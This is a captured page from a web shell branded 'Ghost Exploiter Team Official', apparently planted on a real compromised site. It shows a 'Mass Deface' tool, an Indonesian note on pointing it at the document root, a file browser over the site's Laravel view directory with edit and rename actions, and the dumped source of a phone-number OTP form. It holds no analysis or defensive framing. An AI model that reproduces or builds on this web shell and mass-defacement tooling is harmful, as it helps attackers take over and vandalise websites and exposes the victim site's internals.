webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
aminiwrc
/
portal.aminikamanpower.com
/
resources
/
views
/
sections
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
admin_verify_phone.blad
...
3.382KB
edt
ren
breadcrumb.blade.php
0.715KB
edt
ren
change_mobile.blade.php
1.416KB
edt
ren
left-sidebar-bkp.blade.php
4.765KB
edt
ren
left-sidebar.blade.php
13.868KB
edt
ren
right-sidebar.blade.php
0.242KB
edt
ren
todo_items_list.blade.php
3.578KB
edt
ren
<form method="POST" class="ajax-form" id="request-otp-form"> @csrf <div class="form-group"> <div class="row"> <div class="col-md-12"> <label for="mobile">@lang('app.mobile')</label> </div> <div class="col-md-10"> <div class="form-row"> <div class="col-sm-2"> <select name="calling_code" id="calling_code" class="form-control selectpicker" data-live-search="true" > @foreach ($calling_codes as $code => $value) <option value="{{ $value['dial_code'] }}" @if ($user->calling_code) {{ $user->calling_code == $value['dial_code'] ? 'selected' : '' }} @endif>{{ $value['dial_code'] . ' - ' . $value['name'] }}</option> @endforeach </select> </div> <div class="col-sm-10"> <input type="text" class="form-control" id="mobile" name="mobile" value="{{ $user->mobile }}" autofocus /> </div> </div> </div> <div class="col-md-2"> <button type="button" id="request-otp" class="btn btn-primary w-100">@lang('app.requestOTP')</button> </div> </div> </div> </form>
<=Back
Liking